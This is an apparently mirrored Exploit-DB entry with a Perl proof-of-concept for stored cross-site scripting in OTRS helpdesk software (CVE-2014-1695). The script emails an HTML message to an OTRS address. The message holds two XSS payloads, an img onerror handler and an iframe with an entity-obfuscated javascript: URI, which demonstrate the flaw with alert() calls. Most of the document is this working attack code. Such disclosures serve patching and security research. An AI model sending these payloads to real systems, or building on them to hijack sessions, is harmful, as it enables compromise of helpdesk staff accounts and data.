OTRS < 3.1.x / < 3.2.x / < 3.3.x - Persistent Cross-Site Scripting - 体验盒子

作者： Adam Ziaja

日期： 2015-04-27

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/36842/

# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS
# Date: 28.01.2014
# Exploit Author: Adam Ziaja http://adamziaja.com
# Vendor Homepage: https://www.otrs.com
# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5
# CVE : CVE-2014-1695

#!/usr/bin/perl -w
use strict;
use MIME::Lite;
my $msg = MIME::Lite->new(
Subject => 'OTRS XSS PoC',
From => 'attacker@example.com',
To => 'otrs@example.com',
Type => 'text/html',
Data =>
'<html><body><img/onerror="alert(\'XSS1\')"src=a><iframe
src=javasc&#x72ipt:alert(\'XSS2\') ></body></html>'
);
$msg->send();